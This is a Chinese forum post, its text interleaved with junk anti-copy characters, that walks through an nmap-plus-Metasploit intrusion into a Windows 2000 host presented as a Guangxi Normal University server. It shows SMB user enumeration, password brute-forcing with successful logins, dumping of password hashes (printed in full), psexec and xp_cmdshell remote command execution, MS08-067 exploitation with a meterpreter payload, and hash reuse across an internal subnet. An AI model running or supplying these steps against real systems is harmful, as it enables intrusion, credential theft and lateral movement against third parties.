广西师范网站http://202.103.242.241/
) M# w! x' O5 P$ Y5 u7 Q2 j2 F
% r, j( d4 R* _ U6 Yroot@bt:~# nmap -sS -sV 202.103.242.241
$ l8 j. b; R! G, [2 R9 D" o% R X/ I0 Y4 G/ Y- _1 H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
- G' _1 M1 H" u+ G0 [' I n6 d! M/ K; V- e; S
Nmap scan report for bogon (202.103.242.241)
! M( U- X$ d/ h% U! E9 ^% `0 U1 Y2 ?" {- y
Host is up (0.00048s latency).
8 m2 o1 \; p5 _# h& K$ G. ^
& u9 i! G s. ]( O0 _$ @3 oNot shown: 993 closed ports
1 z5 p8 F. n# l" z+ R# t% e9 J; i
) V9 N& d/ t4 a1 L! `5 ?PORT STATE SERVICE VERSION# ]2 U. }, g8 L/ a0 ]
- F' D$ C4 a: X( {( S
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
* _, {- v# K; ^6 T" O% }3 I: z& k$ m# Y+ W# s: O9 F, _! L, m* ?
139/tcp open netbios-ssn
+ t B* P* X$ W- z. L, N' U
; E# U5 d5 A x O445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
* T# \+ v% ^7 A
" {$ c3 D! @1 e: \* C, b1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)* q: z Y* V; F4 _
# V9 b$ |! d* w4 [ ]
1026/tcp open msrpc Microsoft Windows RPC
; D3 j( S, l' G3 o/ {* E
- A6 \; s6 M) t& c: {3372/tcp open msdtc?# u4 B# k6 k8 V, h9 I7 Q
. V( f; ?/ ]* i# e" q
3389/tcp open ms-term-serv?, g: x* y. V3 V6 G" L6 D' B w) O
, Q0 ?& M0 w/ j1 s' G1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :+ o( j4 k8 |2 a+ |
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r$ }0 F& X. E$ v& f4 |
, ~ }& b: Y3 }SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions4 p- T8 u1 h# B% V
" {+ ]& G8 J9 H% xSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)7 i+ A, I0 ~7 c; f
/ v6 p; g% w1 ~( x6 U0 k. {
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
& y3 F& ?! E# L. @. t+ O/ V, K h9 x5 N: ^, M$ v, T& }! G
SF:ptions,6,”hO\n\x000Z”);
% |# d; z/ ?. j9 o' s4 ~+ ~9 H) l6 v8 [( h$ B1 o$ h0 R6 q* F6 v$ j
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 C- h3 r. I) d& l$ E
2 B2 ~1 K- c" o: ^9 o
Service Info: OS: Windows! r0 }7 S; ?3 P0 P& h
9 n4 C4 r+ x- a2 u8 z6 |* oService detection performed. Please report any incorrect results at http://nmap.org/submit/ .' p- V$ g3 Q# x, p+ Q. e$ ^
' c3 S$ |; l9 ?7 Y
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds- a& `6 b4 l$ i7 I1 P6 f. Y
/ W% Z) I j% D) `' groot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
) a% [7 h& H* O* T8 v
% s0 m6 j- ?% Z" m* \4 I-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse+ S/ [/ L& {4 V; a* w* F7 f4 {0 z
" B2 X( Z( [( B* e9 i* i" f
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
/ P; @+ V9 o! X1 p# k* i3 h) ^( Q4 v! f# b e
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
; _. y$ C- e% U* D E. D) L# s+ H( R. S8 K4 ?
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
3 K$ y' r1 _ A! y$ q: N
: Q: b2 h* Y5 \" ]2 X-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
9 J. ^4 q9 Z0 ]5 j& _/ |& {; a! f) u) F* x, f4 f
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
- a* T* f' P) U4 [
: z U3 h3 n1 f-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
7 S+ {, `8 }; J9 H. k0 D+ J& q& Y4 B" Z/ Q
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse% _0 y" v% j) ?* U! p" f. S v
/ V: A1 g8 W% j `' Y" g% g- S/ G1 w-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse, V" P5 ?/ d7 Q# U% ~; c
" p3 R2 G: T8 g
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse9 |8 ~5 e, G: Z8 ^
# o( a# d$ J7 v. O' ?- T- a$ q% e9 l-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse- [1 ?/ Q5 h/ s$ A
5 H& T$ P: z2 m+ c+ }-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse; [/ b0 T7 O6 [1 R' l
9 f; |; R* @" @. ~3 `4 B6 S) N' _-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse$ G4 w' |% M4 y% b& D
, p! h1 n% k W- s* i-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse1 D# f$ u# S6 ]: p3 Z' N
H1 U% [* w' h) P& k- s7 X-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
0 C8 h T& G3 m7 B- o* ~* R$ G3 d* J( h- |" a5 s) j
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
/ L( T7 a9 N% l! d% G( v- V6 L
( @! G" u& N) C- n//此乃使用脚本扫描远程机器所存在的账户名
s+ t: o1 S3 h; Z7 f; {9 L0 v
+ \; u/ `$ W" j# e6 X' ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
# G/ J- L6 X, y/ U( j' p% ?5 h! G! j$ a: r* ~% k' M
Nmap scan report for bogon (202.103.242.241)' P) ?* W' n7 s/ e: [* L% w
& c3 Z* N# _) j. a
Host is up (0.00038s latency).
) P' d. X0 T, d
7 F B8 S5 _8 U6 o7 g8 V( h0 Y) c( vNot shown: 993 closed ports \2 {0 \# y" d4 q% v A5 w
; V$ a& U" T* B, Z K' V5 o- }
PORT STATE SERVICE) u7 X- |& R3 O3 p
G1 e8 C; ?+ \, w( i135/tcp open msrpc! W# r- q6 c2 f; A' o% O& k" A5 g3 y* s
# }- f8 U9 y/ e1 c139/tcp open netbios-ssn
9 }# s4 i* B/ \3 u. c* K5 I. V
/ [; U# @! S+ L, P) B2 O! b4 t445/tcp open microsoft-ds
, L" Q1 `8 i4 v3 G: U3 C. u _6 E3 s2 l4 v& e4 J
1025/tcp open NFS-or-IIS
- U) @* g' F* M0 ?& L/ \
! n) J5 _ F, ^& J% j3 ]1026/tcp open LSA-or-nterm9 _5 u4 u5 W+ E
) P& G% G1 P3 b: U* n: w% Q: ~3372/tcp open msdtc5 X# @( p' k; b
! }9 j, S8 _. d; p; M( D3389/tcp open ms-term-serv9 m& ?" R8 i: l
( c% h7 s$ b; z! p& A
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)4 ~- b G: r. J
6 a0 y- r" [' F8 \' d! T
Host script results:
& q3 ?4 ~9 Q! T% u( Z4 E* @
. z4 G' R5 @, J$ h1 W$ M| smb-enum-users:( `) H1 }0 ~, Q* N: p: X6 w
0 ^3 `' P% x9 w# h$ w! }- }. e
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果4 e$ J" ]8 ~" ^3 ?1 R$ Q
6 i) J# @$ }, ^Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds5 z9 f# o5 }" G+ R. m3 F- j" Q
$ i M ] a# ]6 c; nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 : a) l0 Q& J$ A
8 i/ r; r1 O' m1 s0 N
//查看共享5 n6 h0 V0 L1 L! N- J! o
' W2 T4 ]- O" E5 pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST7 k0 n7 O+ q2 h2 i
1 P) I& p# q. W- a2 qNmap scan report for bogon (202.103.242.241)
0 X) g8 S" a7 X; I
9 ~% o y& V% U1 ZHost is up (0.00035s latency)., [, G8 f% ^. O
5 B* D+ Y; k8 D2 k& ZNot shown: 993 closed ports
+ j5 `; F5 w3 O; R% C1 m" B6 V+ Q7 p7 _
PORT STATE SERVICE
* a1 y: P) [( T" L; ?( I
! n6 t' O8 a7 j135/tcp open msrpc& I+ D( R* }" i2 D, n; D+ \7 F4 i$ ]4 ]7 k b
- R7 s7 Y( H& N: n, o/ n8 A
139/tcp open netbios-ssn0 O/ K/ L6 D" }& ?9 I
8 G1 i; j- A) i0 c6 z: A
445/tcp open microsoft-ds
8 l" a. {, P' Z% |$ E+ i
( c' Y+ B4 O2 s( z2 [, b' i1025/tcp open NFS-or-IIS
! J+ J$ C- y- h! L/ c0 W' x; v/ l% I2 Q: F4 W7 Y2 Z1 q+ M9 w
1026/tcp open LSA-or-nterm% m6 n$ ^% f6 p+ k
) j1 I# ~: T* |! i" M" u0 g
3372/tcp open msdtc( F/ @( y, f+ v* s- C' X
% |, N L+ N! S2 _- k& N3389/tcp open ms-term-serv. V; i q: a k. P4 t
& z6 f8 n& a2 Q1 V0 HMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
* ~$ z8 f$ D. `$ p, n4 C1 d8 {6 ^0 f" n5 U5 z
Host script results:$ B- |$ s4 v, ~' \$ e, x, Y6 Z* e- w
N2 [* A. L) o" k) H6 W; \6 m| smb-enum-shares:1 E& N# W8 l9 b) k
* [/ l L( j9 u% r2 G2 r/ Q| ADMIN$* r6 o4 Q+ b+ b1 P( J1 E: a
3 l. L/ {& L$ W7 v o: p' N% t% j
| Anonymous access: <none>
7 K6 W4 k" m' M. Q% U3 w9 C' U
1 W' @5 P) }9 W( _! K; T: J| C$, ]( x! a& @7 i" L" q y
: f3 v! P4 L W' A5 w| Anonymous access: <none>
8 D% A" Q+ F0 \# c3 Z0 Z. S9 W1 x% q' R. A3 w- n, ~ y5 `* F
| IPC$
5 |1 q3 t: l! K K8 M: i8 U4 M
( H; F/ h n3 e! ~|_ Anonymous access: READ* B1 ?0 k2 d/ v6 S
+ A9 @) Z3 d- K, GNmap done: 1 IP address (1 host up) scanned in 1.05 seconds2 _* W1 H7 P$ X$ R/ [
) m3 l* J: j9 m J( s0 k# L
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
4 K1 l4 e! i5 P- A( p( L( w+ Q9 ]7 i" h
//获取用户密码9 @# f; {4 i7 C+ W
/ ~7 K& I/ h, s- p
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
1 n0 d7 K, U* ~7 U4 h# ~1 V6 p
) x0 L) Z; X. z, }- t" W+ }5 iNmap scan report for bogon (202.103.242.2418)
2 k* g4 }! Q6 Y# f$ k7 t
- w; C. g* F# _0 _5 B/ I2 I' _Host is up (0.00041s latency).
/ [: l& S2 T% w2 L) Q( H! g4 j1 T, \0 F( x' i) T3 X0 P) z
Not shown: 993 closed ports
- _) s u% Q( d# P) T7 a& ^( _' e) l; g1 n# u
PORT STATE SERVICE$ N3 A9 [) ~' I/ z
; G& m% G; j. s: P6 t135/tcp open msrpc, f& }& S, y% Z
# v1 X6 j# Y3 J8 ~# h, |4 D8 Y139/tcp open netbios-ssn- P1 U4 }; G# y2 v/ X0 O* M
! ?" ?- P, y5 O445/tcp open microsoft-ds' d- [0 z% E7 N( N0 _. t
$ o3 i. R+ j# `/ k! G# _, _* v
1025/tcp open NFS-or-IIS- C, F3 Q' K6 E+ ^2 \. l
" q1 ]9 }4 M$ x' ]9 _9 w a1026/tcp open LSA-or-nterm
* J' f, r. N# L) j* v
" C! Y9 V: X2 b8 V/ y7 p% O `& t3372/tcp open msdtc+ S+ Y& U+ Z; O( i. X
# P1 Y) C4 G$ ?' i3389/tcp open ms-term-serv, q1 ^* K/ I' }& E0 R1 N4 ^
4 U6 }2 a/ ^% X5 b! `# hMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)5 L) j0 {% K3 k
& w. i( p; X D% e; M" T3 M, xHost script results:
: B# c' x, s, Y4 q1 j8 N( Z% ^7 R2 ~9 n7 E* D# e/ W; H( n5 ?
| smb-brute:
! u) S8 O% o1 M5 l8 ~( C+ Z4 T! e) H! s
0 z* D2 [. O o+ X- yadministrator:<blank> => Login was successful
! C! Y4 A) Y1 J! h1 N s$ K9 @
+ `$ c' {; P W) R0 d: z* q' `: @% V|_ test:123456 => Login was successful
, P$ U6 B! g) p+ z3 Z
( o3 T R& C, Y* a9 Q% INmap done: 1 IP address (1 host up) scanned in 28.22 seconds M9 @4 c" k+ ]% z" O+ d: L
: c, B+ |5 G3 o, ~
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
; O. n: x* w: }( m2 S4 ~' W: I, Y8 k5 r& {) [
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
: s# l: r' X' A4 F9 ]( j1 R) `# L. J% K" F' ]
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
. `; _" d2 c0 q" K, X f& f9 o9 {: U! w4 K
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139, }4 Q! }% W2 ~ m
! M! x- H: |# Z6 \# eStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; Z# q+ m* e$ v* \
+ L* L/ N8 h6 _ HNmap scan report for bogon (202.103.242.241)( o' |0 m* Q8 I" V3 _
6 c8 `! [( _% O, w6 KHost is up (0.0012s latency).
- [ b) ^2 ]8 g
' o, c" l2 q/ A% M: [PORT STATE SERVICE5 N5 p2 J% V4 O
+ U. d( |8 y9 d4 p: l1 L3 t
135/tcp open msrpc( j; {3 n8 J# B8 A
* A7 p! y H) K: Y2 @
139/tcp open netbios-ssn
4 f4 ]! X4 g2 M
7 y& S: H4 d! x$ R- i445/tcp open microsoft-ds" W6 B# G3 W2 d2 \2 B5 a
6 t% L. F' R3 V4 a) e: M3 `- ~
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)5 c. u/ }. h0 `
3 ]) [5 ~: e: T" c# I5 N2 z( uHost script results:& E. M$ C5 [) V! B; k" H/ g8 `5 e, f
8 F$ `3 }5 K, || smb-pwdump:
: B4 J. N; b f# I8 o
; |5 K$ \; l8 u( x: L| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************# j0 `; E+ t* r L) q2 S! r* P# e
- y7 K! j& S2 d2 e* \: }9 Y| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************, W+ @/ ^- L9 P2 T2 t* k% y5 E
( i& E' X3 C& C7 q8 k" y8 \* W: a0 O| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
! o) V. ^- @7 M+ c$ w3 C# ~# \* H* h) Q
7 v) Z, G7 J; r! y|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2. D* Z B& g6 }( x" ?# M
' P' F( C2 Y/ F- K
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds1 a' o( j7 p- U. f& ~
$ I9 Q" A. \' u9 `" d: C, y' H
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
/ f) b$ v: I# n
# @4 {& ?$ K- ]: j-p 123456 -e cmd.exe
" p7 p& C& T z! W8 o) P1 N4 ?. N: R6 {
PsExec v1.55 – Execute processes remotely+ I# `- `0 Y/ u& d
" N0 p: {/ r, `' H
Copyright (C) 2001-2004 Mark Russinovich5 J, a' j h' S$ H. M- M- t( |3 x
9 g: [4 D& ^5 R; U* zSysinternals – www.sysinternals.com( a) T! P8 x1 s+ w7 K
# W, i; T+ `5 A) a
Microsoft Windows 2000 [Version 5.00.2195]4 @! _* Y. _$ P2 Z( q: D/ h
+ a3 ]7 S x# A, `9 L1 r# Z(C) 版权所有 1985-2000 Microsoft Corp." G) G, M' @* V" i; b/ J
7 G" l s5 ^! r6 {
C:\WINNT\system32>ipconfig
: @) k5 f% Z+ r" O/ R3 u* S
" T/ k: l5 l8 h2 a6 j" VWindows 2000 IP Configuration
; P* l) v7 l7 v4 y. H* u2 T" r' l' ^- o+ n7 g: D$ e$ _2 T
Ethernet adapter 本地连接:# R* a) x& }8 k' j$ A. n2 {
) n; @% f: u7 S O2 d! b6 \$ KConnection-specific DNS Suffix . :3 F6 w" \& L2 z
7 D& H' O: }! |) }* g
IP Address. . . . . . . . . . . . : 202.103.242.2417 {6 c3 T) v$ I0 {; N
2 t/ z) T! x2 c2 d) r9 [( CSubnet Mask . . . . . . . . . . . : 255.255.255.00 [' l1 F# O5 J8 i
2 I& U) `0 k( C2 d/ QDefault Gateway . . . . . . . . . : 202.103.1.13 ^% ^9 v2 J& ]
' k8 _6 s$ Q0 C4 A& B$ `C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令7 M/ i9 ~' U8 L/ o+ }2 z s- w
" L( }; G3 ? Uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
& B$ i7 `* ~; Q9 {' v; G
3 r: O$ z; w# S0 J( \! jStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST# `6 \: \7 \' G, x0 A8 q9 b
1 k6 L: _' L$ S* K8 TNmap scan report for bogon (202.103.242.241)
1 O! |5 i R% o* I* a/ E _1 F0 r- T5 h: H2 @$ C& @# ]! G' s' e
Host is up (0.00046s latency)./ c% Y* t8 h+ i% R0 H
- k8 o/ m- r1 }" Y8 F( q1 n
Not shown: 993 closed ports
) P, ^7 @" A6 W- Z: W) ?2 w
$ q4 @0 Z5 i% u0 p3 \6 y3 d1 EPORT STATE SERVICE. i: f# ^, Z7 C/ m8 M
6 F9 W4 m0 `: S+ w8 G' L2 Z& H135/tcp open msrpc
# C) ]/ X W: Z
$ R5 q a% v5 Q7 m! L139/tcp open netbios-ssn
! G8 j5 E2 K& D$ Q- b8 @) [1 |, x8 Y0 b; A* v9 h, w1 z) N* c
445/tcp open microsoft-ds
, r7 F6 _+ I" X
0 z) N" n! z& k. ]1025/tcp open NFS-or-IIS+ g9 f3 d5 f" z; V
2 K$ n; N4 `( }' _" J2 A
1026/tcp open LSA-or-nterm' J# k6 \% B6 Q2 Q9 ~
; s' D+ k h5 ?, G0 E8 n" O% r8 p3372/tcp open msdtc- A# S& y: n" p+ x
9 A4 B- k; n: k( G$ J6 s8 G) e
3389/tcp open ms-term-serv- X& x: t, u& r: A
) ]# {3 E) |1 V. E" fMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)9 W) T; _4 \4 e4 a6 q2 T) I
- M- P/ C0 M @Host script results:- z9 P- q0 ?: R9 a# G0 c$ E% h
0 K% [3 Q9 q( ~; m
| smb-check-vulns:- b; X% B2 R+ }0 G0 G
# a$ q& k% O: `|_ MS08-067: VULNERABLE
7 K0 R) A4 X) F8 g7 G7 O" \' l. Z3 q+ L( a" a: D- r( w# v
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
8 N, W: c3 R* k4 H2 _6 Z1 n% s2 n1 B1 b
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
) z3 z8 v0 _3 @4 }3 o7 N. p$ T' _. O3 \( R1 ]. C
msf > search ms08
% I- a6 F- R: C; J3 e8 |" W5 T H( P# o3 V
msf > use exploit/windows/smb/ms08_067_netapi
0 g2 y# |2 Q+ `& A! L: J5 z q3 q+ x4 V2 D) a3 h; M/ L
msf exploit(ms08_067_netapi) > show options- y+ }* v/ {( J4 V6 x% O" r4 T7 Q
+ b- r& C% b* p% V
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241$ a6 N+ P) B8 R: D4 W8 V* _
. J5 M: m2 N- B9 b
msf exploit(ms08_067_netapi) > show payloads
- M U4 W! c" b* t. p" q' \* m
* j/ A" P0 k# a1 e. lmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp5 U8 [4 J1 Y' O: g$ @, Y9 V
, U, |% m9 F! t0 W( T$ {! [
msf exploit(ms08_067_netapi) > exploit* t7 a# Q. T5 Z% f9 ~: D5 v& {* v& ^
; h, b% u. L& w$ L: rmeterpreter >* a }# x, |3 O
% V, n" @% g: Q* [8 |* G6 a( [
Background session 2? [y/N] (ctrl+z)
! h& g# D3 v6 [ B, f& l6 U
1 \( r% v, H; ]msf exploit(ms08_067_netapi) > sessions -l/ @/ _+ h1 H$ S q' |# W
& Z# K, Y1 n2 r( |8 x& \( d6 T
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt* _7 B$ |, J+ I6 H6 m- M" ^
n' q: m3 P" T! \, |5 ^9 T/ h
test
* Q2 c+ p+ S' C/ `: }- W) W: p2 L9 J ]
administrator
0 {3 e3 @- S3 \; ]1 M) H+ W
0 \" K! |/ s9 T, U( x) `! p5 Mroot@bt:/usr/local/share/nmap/scripts# vim password.txt
3 G7 q& K. [; e+ `2 c4 N1 w: D) h( t; m" {$ m2 d. _
44EFCE164AB921CAAAD3B435B51404EE, M. ~6 j3 n, u
% O3 f$ z& B$ O6 O* \; Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
: X1 J* O1 A! A$ \! @& _! Z' Z. k2 t, e4 I3 W+ E' b3 z$ q- |
//利用用户名跟获取的hash尝试对整段内网进行登录
8 s6 N4 f2 G: x: c! C" R' R# f0 \7 A- E4 c3 t
Nmap scan report for 192.168.1.105
6 h* X- w3 N! }3 p
, \& W0 u4 m5 ~" q) ^/ bHost is up (0.00088s latency).
, |! U1 O; c D" ]
$ ] s6 ]2 _! c7 }: INot shown: 993 closed ports
( I$ D+ r6 x1 E( r5 E& t7 u7 R
2 D! O4 V! J8 s7 c+ K7 K( G$ ~1 z3 cPORT STATE SERVICE( Z6 j9 N; w7 b4 m
8 M. D D( D1 x" P9 f135/tcp open msrpc
4 b1 A" {6 G. `% N' s7 `4 K
8 e5 |2 o1 |4 J( x9 K139/tcp open netbios-ssn
9 B, [/ x- a9 C7 _7 i0 r" p, y% r. a
4 y: ?/ f, p% ], E0 C! p' A445/tcp open microsoft-ds" {/ B T( i& N M2 x9 A: _ R
) g' j: ]" j5 t$ D
1025/tcp open NFS-or-IIS
( @; C. `* E# m& c6 h, i- X% _2 `1 o& m
1026/tcp open LSA-or-nterm7 x" ^0 q9 Z/ M+ I, M7 F
3 t! k6 h. U# v+ d$ _
3372/tcp open msdtc
# |8 N" I1 G v9 }- c# V5 I r% u: P7 a, a& U
3389/tcp open ms-term-serv
* u; _" Z& ?& W8 Q9 _7 Z: i; q
) t6 V O& z/ u+ Z t# h* g& ~3 DMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)2 P6 }: F# y. |4 }
+ ?2 ]" n; j+ |# T- j! I
Host script results:
# B# q4 o, G: `! U p4 {3 ~6 H% Q# m% R
| smb-brute:0 Q8 I: e- c! I
& u/ r/ R, |5 x8 W
|_ administrator:<blank> => Login was successful; ?1 |3 \4 l9 ~- i
5 }! Y9 j9 P9 G9 @+ w% [% [攻击成功,一个简单的msf+nmap攻击~~·
/ I2 v# |' Z- \: C# U8 u
8 N3 _, D- S! e3 _" K4 H* K |